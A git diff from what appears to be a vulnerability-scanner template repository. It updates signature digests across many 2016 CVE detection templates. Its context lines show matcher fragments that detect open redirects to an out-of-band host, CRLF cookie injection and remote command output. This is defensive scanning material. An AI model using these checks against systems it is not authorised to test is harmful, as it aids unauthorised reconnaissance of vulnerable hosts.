490a00463044022047e5bc89fdc028eecb6accc82d9d3416b1743e3d963544f9c7cde9519145db2c022037c360ddf63f09a4574f54b3c6e88b3d5609a5f85dec9c98b70ecb821e7be7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207509c0bb42fb8beea9d374691e4d0648fe4b9974dc48ece76050c3c2332a706e02205c4eac20e3d4a5a6d46127d83732bf2f51134ce7675b04f709545ef734dd0791:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 89ba5a6ffa..9718a96350 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202fbf7fb39a9c96b66e0097ca1b13334f89580f737e1ebc73a5e922955b3f566e022032db892d07e36bafcd44def2576c4dbea52b88b5e4efc6e474a9812f051140b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203079f3b7e9b0f86307b1651ac4411c822f8293ca879f3f2d229e487781e300b20221009ba7d5c5f0fce5453c2181ef196132eb238bca7cd78fa7c847f339e29c536d6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index c9bd532243..d89b202bb9 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022066ba8a22f14b3e0c57fd136eda6a64628f189a3c0897b09a393c482aeda8cf30022100db804a0cfa3ff0731ece561abe335e1f8003a90341dcb8a314ae4543120ab828:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054dacfb7bf4388ca3ecac41f007f76ec517e7d9a2cdd0fc0ab7afb93ba35676a02202edeba3e720766ed9567182468c708e90aa32220228759845c12157f49c240d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index 6e131a074e..3f48f403a4 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f3239ff972161e24aca8bf71e1f1521d3187bb86c523eeb72a2ea2e0aa08a12c02201d0977e00530389a5ddfa4b4e5c336e60dc52c7b4ac6659d003a508bd7111e24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a731f173c1b2fa33817ce99fc2f70dee28299becf44951557dc414830832c07b022100fa60b4e3c8d1f33ed9ea0792ff44f87d2e6714158cd4d98162b0c4beca956396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 3340718a8b..12620bc188 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e11b59590fb5e11215513513bfc35c13cc2cb35612d4bf738fb8920c6bc688ee02206c93ea212aeb8f613a8d78e7130372b903b1e884981e05ab41b34c8da05bb1bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201fd7069fc73788de30d00b18183623a5dbcb6a559860b348e37b795505da2d670220755788b136039b9f5a598ca888bc6f5d7ac31c93f9e280cfb625c979c54051f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index e17b763428..2d146aecdf 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bd7768054ea7d2cdaaa293c8dbd3650c0e844a1f7d00a9d9e1c2de7c22668228022100910936c4c4bb62052f5aa9f885dd0e3cf525b1bb615175b2c1b0a703b55fcf07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5288014858667d09cbe619d7031639a713b24df77e0dd22adbe3f10082fe61f02203f7217d1cb95de5df8854414c1c6cf7ea92ef16e8610c34b8551b657224844f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index 80e66dec13..6a585e9042 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ea6ef4d537b1bd7a8f833f12df4da179f34a4f2624dfd7c9890117ff33b055b302206b7f2cdcb13852434928d5cd1d0b91a4ca04e65dc76bdaf79e10357bf77a6bf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210087f90d43de3ee7371ad3bd5348bbd9076a86e5c3eb5fcbb3b38dd6983ca1eea4022100b48c30c74874b02dd3b0705b8d01d640190d1086f149fb729756ed5c2c5c9e42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index a58dfc6b01..bd9253dd41 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022056b01771211e3c34ab1cee5a82de7389cedd20ce4d5a4a1ce19b3b20bbb86293022002f2fac47b84c364827d0040101b36a98b508648776caa202680e8b449340920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c0c7e1d3d95fd55fa31c911394d99365f56418c182e019b9c98e47fdc905d2bf022045a7de02f8e7d09989013e069027dcbb0ecd4ba16d9df7cd87347e8bbfe5adee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index bc896b113b..b51de87d57 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c99fea519cda5eafa614700d77b99e359161f4f3af3c183aba7568f3871c940702210089a4d6d77ffef79d9f754d6e768dd69a0274d8925ddda02d058ca54bda2fc2e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c66267cfb02cf13372138edccdaa9f2899e13afb907ed2618c0512787dc51ad502200ccf9e5b54dba36c133d15f796041e47992e95f6a5d10dc33abe2577fb7b88da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 20e96a956f..2ab1426525 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e1f0521838c2885e1b261ccf9f75e7d5fce03c68143774e5c51d9e2ec04aa460221008d6d8821f9f324f964566338a04fdee2e0db95cfa34c8efef2fbe87ea3366457:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207178c2061f28116235638f13be25e86766221faa97c95f1c8f1d05b29b7358d10220200dd2b0d608c8fbf281f5916c165160f433be97dabb6fc31c07a67fc2e0b40d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 4c05d8b833..fe4420bafb 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fe47bbf2d6b77cbaf7c14f4d4c3fdec3fa4f8e7760ecc729a6d6cebdb8b912890221009014c68b01c8342e2958cfefd2d4e86dea48acac20d8b8ee693e0f7f07884097:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f841979d6707610f1f368b3b2338a0cc7816147fdf4db494229a777f41daa970022100f35bce5273d2c017df5fa63d31662ca07175f99f6eaabb6c8806c2069dae30bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 71b0189969..46c9bf2847 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008266c058f77b0bcce7d5c3840b1de017c2f9c9dcf29b4c25de3da0795616b617022051947c2820e443c04fae4fe4b80fc5d8b3c585f6fcd746499351570a80791f3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d7d5813a2579ff4b5cfeb38f14f242d477361de5abcb483e7c5ed4b9c5ebff2102204dcdfecc6975505a26bde4fff51512b2ff84bb9e86f6b4f48428b871fd2fa745:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 209d26fde6..895a61804b 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ec25e6281060d9339067044f5110e8613194f364b3fee806ba5124a7cdca4dbf02207bbf5ebac1e11b387d6db81dcaf382b7d21f7c0b651cbbe19b4a127052c19a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210095f24e585a5d37c693a96cd6bd60c0ecfa331ffc7f9ab635925d0c147b0cfb98022100ceb5e391cb9e129f3d4c8c598e58dfa136e8407d3330d41d53480dee914a3c97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 02b6538cfa..5e859b6c35 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207ccb36889b8796180c158af5d053cddea2edbd1a802d93fba5f3017279b8bbc4022100a0fea68147acf7638f88337db9baec2750f479b63bc5e74200ff71c9311cf693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100955ffa11eece07af0cfba023405fc6170503ac1e3d623ffc32df2861fe98b9b0022007c37c4deb3d512648bd16c4f7d38bc4be48e053a9d7d122456adf2073abd3b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index e517b9ff9a..70bf2de23f 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e07437f284d69ad7b1e86b00b90017f487a6ca63ba0bb1f5107015a7f85ecc600220153bd6ae71159dd9826db4aa229bbc07e303d5655b6d567aae3fb89c45e8bc26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c9a8362608444575810c42c3a22896387ac8add2436a89743f157c9e80f0522022002d774ff5a7bf2be16272ac3f7ef9db27dbb05c44a2962f28f0c55d10ea9329d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index 9d70a0c75e..cab9753817 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220522b8d1268fc27200f3edb6ad9277377dbf2941cf980dce8e440fb4520257a7c0220650d2c599689ac4226a6d3839440c8d4991a99d77b01e3b77f968df17206624d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba5460a812bdae26380e9e935555361ee64d3632f07d311ac7a3999191f372fa0220363661cc6cc59a5b0dbb2ab737003e8cb5e08c863bb263cc9c7cbc0ee6203700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index 7e2a1e2e90..9071c3c561 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bf315e4e4b2acd440fce1661b0a78ad199ea7a5208c22039c4b52b2bb7549e6d022100f2a8260024b23ce01882cce685ab0ad2c6c3436d0a96e82e011e398729ce62a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200e527199ff680ba976c28801bc0529b5d44fcb5c5f98531da4f4a8de61e18f4c02200c93395df89d68a0a6e3c27b3770f1bcc594748a0f7c50aedea263f16cd66d74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 853a373c6a..a7a4aaeaea 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f116555a765ecc01ed0d4e58b0b862c5dd7e61b4d320431a29a12fab781482c902210087de7745ed7f4e466ed4bd28e2964b67f05bce0967bf45893ecd25893d347c34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c5bd3395922e4d4d94f70f082d7d7ff53902791d953203ee486a404e88d5de9022014c3ca3455afdf834b5a159409cd9e1dce749840033c1816d47c989482fdb95d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 75ffcb78ca..e3e9a6abd6 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220027603f0d1de2acc97e034855a99ec951e107675f80ebd29fc7bf81a24688123022100aa8edd1f5bb3e9b8565748afd25a344bd0ac85b9f44b7e54af747bedd030e50f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b71b7e87ddfa3ec48946cdef3b1600222f268e4649d32500df6231c69bd037850220627172c05ad49947c2d31c2aea31fadb095f89346916efd3420cb998a17589ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 057c127a47..3f7c8a8e69 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220756ecce1cb5af708018bfca00a194af5448f9907a107220029c9eb45c5e73eb2022100ac155b8a798d889d77e3646cca606a536d6d35cca973209e5de2af224f31b6c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206bb3d55725dbcbdbc21e493444d32608d41d2e62fc98bb0367f416e61fd8e990022100a8814a292abc5eb860d253d40c7e9b49712ace5a2f3e5f369e5e14ca0fba7bf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index b409ecb628..0722eefa53 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220700386522ffe5ddfc1a30a6047ae315fc8d1389e1039d14957ae852f08210f76022100c6111d1efffc8cd422bfade29fbd1c4978558677912eda2687b36b1c62d1cf14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a66a8bf88b469bb5e8b519300017afa5bc62bf5e77465a3f5c805d2a5d4b0dd8022100f2f55309d537bf8ed6e07289988a82453c3ec8c26a545967a02128252833e2a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index b9128760ca..b12eaebaab 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022009029953295349c4e81b6d0d11d5a6600ebf0d90eef2e32d78143414e9387e9d0221008b132abf1f395a139dd3aa0eefe38486054ca70209f01bdb8990d7e83b7318a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100abd40ef962ee2a03b66a26382002eb7389f7ec1ce710bca75f814e3763d7a21d022073abaebe2e7389726ad9d5bed7999c687fcb332dd51ef639390e58fe5e536fdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 247c5cd4b0..683de12902 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220371986730365fa3c1674aa1f56a72baf45ff191c9f1629c48186c33a96c6173802200648d66b4e5d140cd9da1c36b9f739331a5200dc9e9d2e4bf3cc9323dff15fc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c6c1027b1df7e5b08532b589beafb8f1513c1bcc70e929fdd0826af5e95664c022100e634e9f3a690e8629bb5fd2f2c18eb1124c26d621c3cf50889eab7ac69a2286a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 00d9b940b5..d39ebee05a 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c9693b1bd6fbc22838c78600a4754fab312b29b642040567899c5433eb8bb38c0221009c1e726b0d49c9e43d9cd99d487fa5f07719ed3f3c8437b9b8f5753b3910ce71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a9ab5146ac0074610cb6b32526be487ffb29f91faeaff83350ba47364ab639e3022100d31a9b2d25b24f5dcf69f10002b731f73b742017ed98d6d9f07c0df7b59ad0fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index de3fd21e68..e308d36ab2 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ca2b31ff2f83ccd4ee6513321136f5020f5ea49549298a2369adb8c54ae01be8022100bf02254bf633a2592d0ebb3da302b02c9b8467787e456b74002e6d8329caba18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b91d71900ed53024ef6b9293e7690212af20ec32856c78d8f4b1ae792532f34022040637c20d9eaea77b61f7aee3d23412e885ddd6ae39b680bbbd0335c7c51c694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 1b464facce..c29529973b 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022028714ab0ae776313a89a1a83d16078998420d0259c83dd9245278a1885f94e0302210083dac941158df2bbe47e48107a7ec08600a8434ffe56950ecaebae644b436ef3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0a77b14c9e0ba53f212c3d6c4ae605d7c2af384cc3d9d1e538e0aeecfc4fdf7022045e47e36e008456c8ea8fd6f44f6076dd30c3e8332ddd5760e146f2c2d7cac99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index f4bab3aec1..bc225fd45f 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022064a357e04bfbda7eb1c4bbea5da2de7e8f09f1f848068a06e4d55b7cb2497fda022100ade13f3934e3425bb93c2be505bd6aec8eeec5ed9fc69c84515e92da8a4d3d54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018a825747d78818fdb7ced045c8435e2c292a9e2c97b314289f989ec9b75c6f402202ccf2131d2cdb4eb4fba454e3c56c741f459f3545b3290c9e896aa9eeb47bf4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index 86bc158dd4..19d77f8567 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100f475aa06b90130e2b8e28420ca4e0e3d4b009c40aa6a2f5424c85eb78dd4a0790221009c477bdc34bc528ca9464c768743191bbeb359f13af23fc1671c883716c0c151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fb94ed624af7fd26b76760fd08c8c10737f8720e2fe24c2f4a104ab3ee3e72020221008af112871203ce7327a44d125997b1d4d018d238a45bca135376b79ceac0e17e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 64352a6e12..66ecc307a6 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100edeeec357936c76c423de1da0e437b54e39b127084bf49d257d6fa40404537df02201b36b8f48e27504b38ea201e03181d77572ba400564be65921717a8b78a39809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f319130cf7f3120fea1c4c0d9fa2d0eef9c3cc8172527a5a2d2aadf7f8dcec0a02206d561e52b06dcd2d43d21d8051af220f4d7caa73706af1900b4c860eb285ed24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index b31f923be3..3a523d10c6 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c0f5edb9dcfae071996574d4771f5371c930a81397ba6ea0d0f78b9df79b08610221009b7dc008da8799de3136a1311363e64efd38638efad47a5815f744dd08597efd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008144b205c7662e0eca54703fa0e4517f6d11721064f2154aaff062ea256ac77002207d8fc8e109ec4a413f84f95841098e75be2fa5a326723d345568ac7f40cac57f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index f90c576be5..8b8c1068f9 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009e0c0977c90d53736ce085938540079399fabd48a44beef5157e6f31f744aa3c022031ced870037d1b5f6dec56a3f31e42b00f7ab652b7ca75d399fa15ba4b69c094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f249d8327e7598cab13dcc19957029827adea67bbb01e416bf51e525fc45fcc502203045dd4bd1dbfa58072b11e5bce342c736dd55a8aaf13aa8a34a4779b7952b80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index d0856229f4..5c2d8820fc 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -52,4 +52,4 @@ http: - "status_code_2==200" - "contains((body_2), '{{rand1}}')" condition: and -# digest: 4b0a00483046022100e9c55b0a4fd5097a215978a5b6010a918d459649c22eb4f1d753883da6f7b60e02210098985705a0228a24548b6efdeb0a9100b39af508de90ebf72528e0588f18cc75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf71dfa43973a168508db9de8e123853306c617b25b2d8b76575042c5d8071a9022004dbec1f986db202f8678ebd43e6e7c5d04be5dc379324109cdd7b7a52ed0928:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 9250d5763e..a55361e715 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -46,4 +46,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100b929553c26a8f5f0f26c3c88587748b9c2a2d2b3275fe12c5f9857e9cede65f5022100c799a6da8b81f359e5defd40655ff8a8351a0246c207ea9b754815cdbd2cf78d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfb451f1430bd798d8d15f5045f30686fdb0b3c7a2fe21f569f26afb2a5e2b3702200ae3988919f8f0ea43447bbc60c4f6cc6e22a1bb49695358fe81e80a1f7122d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index b3528e4663..ee1e08fdf4 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' -# digest: 4a0a0047304502204f08206705552f730f7ad4e065175ade78aef2f56aeb31207f7f6cd92a2fadde022100d8eb6efe698663c3131c0423b0bde31d4866d579618b0cbfd46e9a507fea4b06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a4f853132fc47007d8b7a9c89e088543fae0c12d6b37f4c7d90d2f3836d12d502206094d2fb2affbe34ef1792acc1f9faab2fa02ecb413184dd98be51a5df745ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index e7b7ebde01..f3e9708cd8 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100a996c40fae1f6d19435d135651a1168704634ae606188ed97fef12f4c8a2d3f6022016d0ce56e41a19dd65b863a46c1d4351dbf1e34b890044f16642401ec20f6b0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c66dd438fc32b601bda760d115a1aa6c0ac04c6d508e25af37bed49c7dccb6bb0220745ce2c6eb5aa672f5d9903bf30440d9a7a166a1bc7b45ca0aed623a32b0d181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-5674.yaml b/http/cves/2016/CVE-2016-5674.yaml index b770c3c4ce..e3caf0d599 100644 --- a/http/cves/2016/CVE-2016-5674.yaml +++ b/http/cves/2016/CVE-2016-5674.yaml @@ -51,4 +51,4 @@ http: - "contains(body_2, 'Debugging Center')" - "contains(body_2, 'Windows IP')" condition: and -# digest: 4a0a0047304502206fcc24413a4fab283dc7fd59efec560e4a1f7cd9cd5bf6ac8dd51f41ca604dda02210083c5fd74de3024e39a4fb365680ecbe183fbb381fc280030d510b36eedf92484:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022077af93ab3f7b752a3fc8676fad34d3fd997fd438917a7cc5242af60fab4ca1bc022100b67d707d34c5e15724fcfcc966c4e550015f2255b50e624eca23d3323cb0c9b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 275f758b3a..4c73a3b5e4 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -67,4 +67,4 @@ http: - 200 - 503 condition: or -# digest: 